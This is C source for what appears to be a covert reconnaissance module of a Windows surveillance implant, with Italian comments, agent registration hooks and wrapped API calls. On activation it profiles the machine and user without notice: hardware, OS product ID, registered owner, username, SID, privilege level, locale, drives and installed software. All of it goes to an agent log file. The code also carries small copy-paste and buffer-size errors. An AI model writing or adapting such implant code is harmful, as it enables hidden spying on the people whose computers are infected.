#include struct deviceinfo { struct { WCHAR delta[128]; // Date delta } timeinfo; struct { WCHAR proc[128]; // Processor description DWORD procnum; // Number of processors } procinfo; struct { DWORD memtotal; // Total physical memory (MB) DWORD memfree; // Free physical memory (MB) DWORD memload; // Memory load percentage } meminfo; struct { WCHAR ver[64]; // Windows version description WCHAR sp[64]; // Windows service pack description WCHAR id[64]; // Windows product ID WCHAR owner[64]; // Registered owner WCHAR org[64]; // Registered organization } osinfo; struct { WCHAR username[64]; // Name WCHAR fullname[64]; // Fullname WCHAR sid[64]; // SID DWORD priv; // Privilege level (USER_PRIV_GUEST, USER_PRIV_USER, USER_PRIV_ADMIN) } userinfo; struct { DWORD timebias; // Time bias from UTC (min) WCHAR lang[16]; // Language name WCHAR country[16]; // Country name } localinfo; struct { DWORD disktotal; // Total disk space (MB) DWORD diskfree; // Free disk space (MB) } diskinfo; struct { BOOL ac_connected; // Connected to AC DWORD battery_level; // % of battery } batteryinfo; }; VOID GetDeviceInfo(struct deviceinfo *di) { HKEY hKey = NULL; DWORD len; SYSTEM_INFO sysinfo; MEMORYSTATUSEX memstatus; LPUSER_INFO_1 userinfo1 = NULL; LPUSER_INFO_23 userinfo23 = NULL; WCHAR *sidstr = NULL; WCHAR homepath[MAX_PATH]; ULARGE_INTEGER disktotal, diskfree; SYSTEM_POWER_STATUS sps; long long date_delta_l; BOOL negative_delta; DWORD seconds, minutes, hours, days; /***\ * * Time \***/ date_delta_l = date_delta.hi_delay; date_delta_l = date_delta_l << 32; date_delta_l += date_delta.lo_delay; if (date_delta_l < 0) { negative_delta = TRUE; date_delta_l = -date_delta_l; } else negative_delta =FALSE; date_delta_l /= 10000000; // otteniamo i secondi seconds = (DWORD)(date_delta_l % 60); date_delta_l /= 60; // otteniamo i minuti minutes = (DWORD)(date_delta_l % 60); date_delta_l /= 60; // otteniamo le ore hours = (DWORD)(date_delta_l % 24); date_delta_l /= 24; // otteniamo i giorni days = (DWORD)date_delta_l; if (days > 0) _snwprintf_s(di->timeinfo.delta, sizeof(di->timeinfo.delta)/sizeof(di->timeinfo.delta[0]), _TRUNCATE, L"%s%dd %.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", days, hours, minutes, seconds); else _snwprintf_s(di->timeinfo.delta, sizeof(di->timeinfo.delta)/sizeof(di->timeinfo.delta[0]), _TRUNCATE, L"%s%.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", hours, minutes, seconds); /***\ * * Battery \***/ di->batteryinfo.ac_connected = TRUE; di->batteryinfo.battery_level = 0; if (FNC(GetSystemPowerStatus)(&sps)) { if (sps.ACLineStatus == 0) { di->batteryinfo.ac_connected = FALSE; } if(sps.BatteryLifePercent != 255) di->batteryinfo.battery_level = sps.BatteryLifePercent; } /***\ * * Processor \***/ do { if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) != ERROR_SUCCESS) { di->procinfo.proc[0] = L'\0'; break; } len = sizeof(di->procinfo.proc); if(FNC(RegQueryValueExW)(hKey, L"ProcessorNameString", NULL, NULL, (LPBYTE)di->procinfo.proc, &len) != ERROR_SUCCESS) { di->procinfo.proc[0] = L'\0'; } } while(0); if(hKey) { FNC(RegCloseKey)(hKey); hKey = NULL; } FNC(GetSystemInfo)(&sysinfo); di->procinfo.procnum = sysinfo.dwNumberOfProcessors; /***\ * * Memory \***/ memstatus.dwLength = sizeof(memstatus); FNC(GlobalMemoryStatusEx)(&memstatus); di->meminfo.memtotal = (DWORD)(memstatus.ullTotalPhys / (1024 * 1024)); di->meminfo.memfree = (DWORD)(memstatus.ullAvailPhys / (1024 * 1024)); di->meminfo.memload = (DWORD)(memstatus.dwMemoryLoad); /***\ * * OS \***/ do { if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, KEY_READ, &hKey) != ERROR_SUCCESS) { di->osinfo.ver[0] = L'\0'; di->osinfo.sp[0] = L'\0'; di->osinfo.id[0] = L'\0'; di->osinfo.owner[0] = L'\0'; di->osinfo.org[0] = L'\0'; break; } len = sizeof(di->osinfo.ver); if(FNC(RegQueryValueExW)(hKey, L"ProductName", NULL, NULL, (LPBYTE)di->osinfo.ver, &len) != ERROR_SUCCESS) { di->osinfo.ver[0] = L'\0'; } len = sizeof(di->osinfo.sp); if(FNC(RegQueryValueExW)(hKey, L"CSDVersion", NULL, NULL, (LPBYTE)di->osinfo.sp, &len) != ERROR_SUCCESS) { di->osinfo.sp[0] = L'\0'; } len = sizeof(di->osinfo.id); if(FNC(RegQueryValueExW)(hKey, L"ProductId", NULL, NULL, (LPBYTE)di->osinfo.id, &len) != ERROR_SUCCESS) { di->osinfo.id[0] = L'\0'; } len = sizeof(di->osinfo.owner); if(FNC(RegQueryValueExW)(hKey, L"RegisteredOwner", NULL, NULL, (LPBYTE)di->osinfo.owner, &len) != ERROR_SUCCESS) { di->osinfo.owner[0] = L'\0'; } len = sizeof(di->osinfo.org); if(FNC(RegQueryValueExW)(hKey, L"RegisteredOrganization", NULL, NULL, (LPBYTE)di->osinfo.org, &len) != ERROR_SUCCESS) { di->osinfo.org[0] = L'\0'; } } while(0); if(hKey) { FNC(RegCloseKey)(hKey); hKey = NULL; } /***\ * * User \***/ do { len = sizeof(di->userinfo.username) / sizeof(di->userinfo.username[0]); if(!FNC(GetUserNameW)(di->userinfo.username, &len)) { di->userinfo.username[0] = L'\0'; break; } if(FNC(NetUserGetInfo)(NULL, di->userinfo.username, 1, (LPBYTE *)&userinfo1) == NERR_Success) { di->userinfo.priv = userinfo1->usri1_priv; } else { di->userinfo.priv = 0; } if(FNC(NetUserGetInfo)(NULL, di->userinfo.username, 23, (LPBYTE *)&userinfo23) != NERR_Success) { di->userinfo.fullname[0] = L'\0'; di->userinfo.sid[0] = L'\0'; break; } wcsncpy_s(di->userinfo.fullname, sizeof(di->userinfo.fullname) / sizeof(di->userinfo.fullname[0]), userinfo23->usri23_full_name, _TRUNCATE); if(!FNC(ConvertSidToStringSidW)(userinfo23->usri23_user_sid, &sidstr)) { di->userinfo.sid[0] = L'\0'; } else { wcsncpy_s(di->userinfo.sid, sizeof(di->userinfo.sid) / sizeof(di->userinfo.sid[0]), sidstr, _TRUNCATE); } } while(0); if(sidstr) LocalFree(sidstr); if(userinfo1) FNC(NetApiBufferFree)(userinfo1); if(userinfo23) FNC(NetApiBufferFree)(userinfo23); /***\ * * Local \***/ if(!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO639LANGNAME, di->localinfo.lang, sizeof(di->localinfo.lang) / sizeof(di->localinfo.lang[0]))) { di->localinfo.lang[0] = L'\0'; } if(!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME, di->localinfo.country, sizeof(di->localinfo.country) / sizeof(di->localinfo.country[0]))) { di->localinfo.country[0] = L'\0'; } do { if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", 0, KEY_READ, &hKey) != ERROR_SUCCESS) { di->procinfo.proc[0] = L'\0'; break; } len = sizeof(di->procinfo.proc); if(FNC(RegQueryValueExW)(hKey, L"ActiveTimeBias", NULL, NULL, (LPBYTE)&di->localinfo.timebias, &len) != ERROR_SUCCESS) { di->localinfo.timebias = 0; } } while(0); if(hKey) { FNC(RegCloseKey)(hKey); hKey = NULL; } /***\ * * Disk \***/ if(!FNC(GetEnvironmentVariableW)(L"TMP", homepath, sizeof(homepath))) { wcsncpy_s(homepath, sizeof(homepath) / sizeof(homepath[0]), L"C:\\", _TRUNCATE); } if(FNC(GetDiskFreeSpaceExW)(homepath, &diskfree, &disktotal, NULL)) { di->diskinfo.disktotal = (DWORD)(disktotal.QuadPart / (1024 * 1024)); di->diskinfo.diskfree = (DWORD)(diskfree.QuadPart / (1024 * 1024)); } else { di->diskinfo.disktotal = 0; di->diskinfo.diskfree = 0; } return; } #define DRIVE_HEADER_TEXT L"\n\nDrive List:\n" void GetDriveList(HANDLE hfile) { WCHAR drive_letter[4]; WCHAR drive_name[256]; WCHAR type_name[5][20]={L"removable", L"disk", L"network", L"cd-rom", L"ram disk"}; WCHAR device_info_string[512]; DWORD type; drive_letter[1]=L':'; drive_letter[2]=L'\\'; drive_letter[3]=0; Log_WriteFile(hfile, (BYTE *)DRIVE_HEADER_TEXT, wcslen(DRIVE_HEADER_TEXT) * sizeof(WCHAR)); for (drive_letter[0]=L'A'; drive_letter[0]<=L'Z'; drive_letter[0]++) { type = FNC(GetDriveTypeW)(drive_letter); if (type>=DRIVE_REMOVABLE && type<=DRIVE_RAMDISK) { ZeroMemory(drive_name, sizeof(drive_name)); FNC(GetVolumeInformationW)(drive_letter, drive_name, 255, NULL, NULL, NULL, NULL, 0); if (wcslen(drive_name)) _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, L"%s \"%s\" (%s)\n", drive_letter, drive_name, type_name[type-DRIVE_REMOVABLE]); else _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, L"%s (%s)\n", drive_letter, type_name[type-DRIVE_REMOVABLE]); Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR)); } } } #define APPLICATION_HEADER_TEXT L"\n\nApplication List:\n" VOID GetApplicationInfo(HANDLE hfile, BOOL bX64View) { HKEY hKeyUninstall = NULL, hKeyProgram = NULL; DWORD dwordval, index, len; WCHAR stringval[128], product[256]; ULONG uSamDesidered = KEY_READ; if (bX64View) uSamDesidered |= KEY_WOW64_64KEY; do { index = 0; if(FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS) { break; } Log_WriteFile(hfile, (BYTE *)APPLICATION_HEADER_TEXT, wcslen(APPLICATION_HEADER_TEXT) * sizeof(WCHAR)); while(1) { if(hKeyProgram) { FNC(RegCloseKey)(hKeyProgram); hKeyProgram = NULL; } len = sizeof(stringval) / sizeof(stringval[0]); if(FNC(RegEnumKeyExW)(hKeyUninstall, index++, stringval, &len, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break; if(FNC(RegOpenKeyExW)(hKeyUninstall, stringval, 0, KEY_READ, &hKeyProgram) != ERROR_SUCCESS) continue; if(!FNC(RegQueryValueExW)(hKeyProgram, L"ParentKeyName", NULL, NULL, NULL, NULL)) continue; len = sizeof(dwordval); if(!FNC(RegQueryValueExW)(hKeyProgram, L"SystemComponent", NULL, NULL, (LPBYTE)&dwordval, &len) && (dwordval == 1)) continue; len = sizeof(stringval); if(FNC(RegQueryValueExW)(hKeyProgram, L"DisplayName", NULL, NULL, (LPBYTE)stringval, &len)) continue; wcsncpy_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE); len = sizeof(stringval); if(!FNC(RegQueryValueExW)(hKeyProgram, L"DisplayVersion", NULL, NULL, (LPBYTE)stringval, &len)) { wcsncat_s(product, sizeof(product) / sizeof(product[0]), L" (", _TRUNCATE); wcsncat_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE); wcsncat_s(product, sizeof(product) / sizeof(product[0]), L")", _TRUNCATE); } wcsncat_s(product, sizeof(product) / sizeof(product[0]), L"\n", _TRUNCATE); Log_WriteFile(hfile, (BYTE *)product, wcslen(product) * sizeof(WCHAR)); } } while(0); if(hKeyUninstall) { FNC(RegCloseKey)(hKeyUninstall); hKeyUninstall = NULL; } return; } void DumpDeviceInfo() { HANDLE hfile; WCHAR null_wchar = 0; struct deviceinfo di; WCHAR device_info_string[ (sizeof(di)/sizeof(WCHAR)) + 512 ]; memset (&di, 0, sizeof(di)); GetDeviceInfo(&di); _snwprintf_s(device_info_string, sizeof(device_info_string)/sizeof(device_info_string[0]), _TRUNCATE, L"Processor: %d x %s\n" L"Memory: %dMB free / %dMB total (%u%% used)\n" L"Disk: %dMB free / %dMB total\n" L"Battery: %s%d%%\n" L"\n" L"OS Version: %s%s%s%s%s\n" L"Registered to: %s%s%s%s {%s}\n" L"Locale settings: %s_%s (UTC %+.2d:%.2d)\n" L"Time delta: %s\n" L"\n" L"User: %s%s%s%s%s\n" L"SID: %s", di.procinfo.procnum, di.procinfo.proc, di.meminfo.memfree, di.meminfo.memtotal, di.meminfo.memload, di.diskinfo.diskfree, di.diskinfo.disktotal, (di.batteryinfo.ac_connected) ? L"AC Connected - " : L"", di.batteryinfo.battery_level, di.osinfo.ver, (di.osinfo.sp[0]) ? L" (" : L"", (di.osinfo.sp[0]) ? di.osinfo.sp : L"", (di.osinfo.sp[0]) ? L")" : L"", IsX64System() ? L" (64bit)" : L" (32bit)", di.osinfo.owner, (di.osinfo.org[0]) ? L" (" : L"", (di.osinfo.org[0]) ? di.osinfo.org : L"", (di.osinfo.org[0]) ? L")" : L"", di.osinfo.id, di.localinfo.lang, di.localinfo.country, (-1 * (int)di.localinfo.timebias) / 60, abs((int)di.localinfo.timebias) % 60, di.timeinfo.delta, di.userinfo.username, (di.userinfo.fullname[0]) ? L" (" : L"", (di.userinfo.fullname[0]) ? di.userinfo.fullname : L"", (di.userinfo.fullname[0]) ? L")" : L"", (di.userinfo.priv) ? ((di.userinfo.priv == 1) ? L"" : L" {ADMIN}") : L" {GUEST}", di.userinfo.sid); hfile = Log_CreateFile(PM_DEVICEINFO, NULL, 0); Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR)); // Enumera i drive presenti GetDriveList(hfile); GetApplicationInfo(hfile, FALSE); GetApplicationInfo(hfile, TRUE); // NULL termina tutta la stringa Log_WriteFile(hfile, (BYTE *)&null_wchar, sizeof(WCHAR)); Log_CloseFile(hfile); } DWORD __stdcall PM_DeviceInfoStartStop(BOOL bStartFlag, BOOL bReset) { // Questo agente non ha stato started/stopped, ma quando // viene avviato esegue un'azione istantanea. if (bStartFlag && bReset) DumpDeviceInfo(); return 1; } DWORD __stdcall PM_DeviceInfoInit(JSONObject elem) { return 1; } void PM_DeviceInfoRegister() { AM_MonitorRegister(L"device", PM_DEVICEINFO, NULL, (BYTE *)PM_DeviceInfoStartStop, (BYTE *)PM_DeviceInfoInit, NULL); } .